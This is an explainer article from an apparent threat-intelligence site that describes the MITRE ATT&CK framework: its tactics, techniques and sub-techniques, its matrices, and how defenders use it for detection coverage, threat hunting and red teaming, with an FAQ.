TI News Feed · Threat Intelligence Guides
View live threat intel feed →
TI News FeedThreat Intelligence Guides & ResourcesView Live Feed →
Frameworks

The MITRE ATT&CK Framework, Explained

MITRE ATT&CK is the common language of adversary behavior. Learn its tactics, techniques and sub-techniques, the matrices, and practical ways to use it for defense.

8 min readUpdated

The MITRE ATT&CK framework is a globally accessible, continuously updated knowledge base of real-world adversary behavior. ATT&CK — which stands for Adversarial Tactics, Techniques, and Common Knowledge — catalogs how attackers operate at each stage of an intrusion, giving defenders a shared vocabulary to describe, detect and defend against threats. It has become the de facto standard for tactical threat intelligence and detection engineering.

Maintained by the non-profit MITRE Corporation and free to use, ATT&CK answers a question that signatures and indicator lists can't: not just what malicious file appeared, but what technique the adversary used — and therefore how to catch it even when the specific tools change.

Why ATT&CK matters

Before ATT&CK, every vendor and team described attacker behavior differently, making it hard to share knowledge or measure defensive coverage. ATT&CK created a common language. Today it underpins detection rules, red-team exercises, threat reports, security-product marketing and gap assessments across the industry. When a research blog says an actor used "T1566 (Phishing)" and "T1059 (Command and Scripting Interpreter)," any defender in the world knows exactly what's meant.

How ATT&CK is structured: tactics, techniques, sub-techniques

ATT&CK is organized as a hierarchy:

Tactics — the "why"

Tactics are the adversary's tactical goals — the reason behind an action. The Enterprise matrix defines 14 tactics that roughly follow the order of an attack, including:

  • Reconnaissance and Resource Development — preparation before the attack.
  • Initial Access — getting into the environment.
  • Execution, Persistence, Privilege Escalation, Defense Evasion.
  • Credential Access, Discovery, Lateral Movement.
  • Collection, Command and Control, Exfiltration, Impact.

Techniques — the "how"

Each tactic contains many techniques — the specific methods adversaries use to achieve that goal. For example, under Initial Access you'll find techniques like Phishing (T1566) and Exploit Public-Facing Application (T1190). Each technique has a unique ID, a description, real-world examples of groups that use it, data sources for detecting it, and recommended mitigations.

Sub-techniques — the specifics

Many techniques break down further into sub-techniques. Phishing (T1566), for instance, has sub-techniques for spear-phishing attachments (T1566.001), links (T1566.002) and via service (T1566.003). This granularity lets teams describe behavior precisely.

Together, these map directly to an adversary's tactics, techniques and procedures (TTPs) — the durable layer of the Pyramid of Pain that is most painful for attackers to change.

The ATT&CK matrices

ATT&CK isn't one matrix but several, covering different technology domains:

  • Enterprise — Windows, macOS, Linux, cloud, containers and networks. The most widely used matrix.
  • Mobile — iOS and Android.
  • ICS — industrial control systems and operational technology.

The matrix is usually shown as a grid: tactics across the top (in attack order) and techniques listed beneath each. This visual makes it easy to map an intrusion's full progression and to see where your detection coverage has gaps.

Groups and software

Beyond tactics and techniques, ATT&CK documents Groups (tracked threat actors, like APT29) and Software (malware and tools), each linked to the techniques they're known to use. This lets you pivot: start from an APT that targets your sector, see exactly which techniques it employs, and prioritize defenses accordingly.

Practical ways to use ATT&CK

ATT&CK is most valuable when you operationalize it:

  1. Detection coverage mapping. Map your existing detections to ATT&CK techniques to visualize where you're strong and where you're blind. The free ATT&CK Navigator tool is built for this.
  2. Threat-informed defense. Identify the techniques used by adversaries that target your industry, and prioritize building detections for those first.
  3. Threat hunting. Use techniques as hypotheses — "are any hosts using technique X?" See our guide to threat hunting.
  4. Red and purple teaming. Emulate specific adversary techniques to test whether your controls actually detect them.
  5. Communication. Describe incidents and intelligence in a language every stakeholder and vendor understands.

Limitations to keep in mind

ATT&CK is powerful but not a silver bullet. It describes known, observed techniques, so brand-new methods may not yet appear. Full coverage of every technique is neither realistic nor necessary — focus on the techniques most relevant to your threat model. And ATT&CK tells you what adversaries do, not the likelihood they'll target you; that requires pairing it with threat intelligence about who is active in your sector.

It's also worth remembering that ATT&CK is updated regularly as new techniques are observed and existing ones are reorganized. Treat your coverage map as a living document, revisit it as the matrix evolves, and re-prioritize as the adversaries targeting your industry change their methods. A mapping that was accurate a year ago can quietly drift out of date.

ATT&CK vs the Cyber Kill Chain and Diamond Model

ATT&CK is often compared to two other well-known models, and they actually complement each other rather than compete:

  • The Cyber Kill Chain (developed by Lockheed Martin) describes an intrusion as a linear sequence of seven stages, from reconnaissance to actions on objectives. It's excellent for explaining the high-level flow of an attack and for thinking about where to break the chain, but it's intentionally coarse — it doesn't enumerate the hundreds of specific techniques an attacker might use at each stage.
  • The Diamond Model focuses on the relationships between four core features of any intrusion: adversary, capability, infrastructure and victim. It's a powerful analytical tool for attribution and for pivoting during an investigation — if you know the infrastructure, you can reason about the adversary and likely victims.
  • MITRE ATT&CK sits at a more granular level than both, providing the detailed catalog of specific techniques within each phase.

In practice, mature teams use all three: the Kill Chain to frame the narrative, ATT&CK to describe and detect the specific techniques, and the Diamond Model to structure attribution and pivoting. Understanding where each fits prevents the common mistake of treating ATT&CK as a checklist rather than a knowledge base.

The bottom line

MITRE ATT&CK transformed cybersecurity by giving the world a shared, structured language for adversary behavior. By mapping threats, detections and exercises to its tactics and techniques, defenders move beyond perishable indicators toward resilient, behavior-based defense. To apply it, you first need to know which techniques adversaries are actually using right now — which is exactly what our live threat intelligence feed surfaces, aggregating research that frequently maps the latest campaigns to ATT&CK techniques, ranked by priority.

Frequently asked questions

What is the MITRE ATT&CK framework?

MITRE ATT&CK is a free, continuously updated knowledge base of real-world adversary tactics and techniques. It gives defenders a common language to describe how attackers operate at each stage of an intrusion, and is widely used for detection engineering, threat hunting and red teaming.

What is the difference between tactics and techniques in ATT&CK?

Tactics are the adversary's goals — the 'why' behind an action, like Initial Access or Persistence. Techniques are the specific methods used to achieve those goals — the 'how', like Phishing or Exploit Public-Facing Application. Techniques can break down further into sub-techniques.

How many tactics are in MITRE ATT&CK?

The Enterprise matrix defines 14 tactics, ranging from Reconnaissance and Initial Access through Execution, Lateral Movement and Command and Control to Exfiltration and Impact. Other matrices (Mobile, ICS) define their own tactic sets.

How do you use the MITRE ATT&CK framework?

Common uses include mapping your detection coverage to techniques (using ATT&CK Navigator), prioritizing defenses against techniques used by adversaries targeting your sector, forming threat-hunting hypotheses, emulating techniques in red/purple teaming, and communicating incidents in a shared vocabulary.

Related threat intel guides

FundamentalsWhat Are TTPs? Tactics, Techniques & Procedures ExplainedThreat ActorsWhat Is an Advanced Persistent Threat (APT)?DetectionIndicators of Compromise (IOCs): The Complete GuideDetectionWhat Is Threat Hunting? A Practical Guide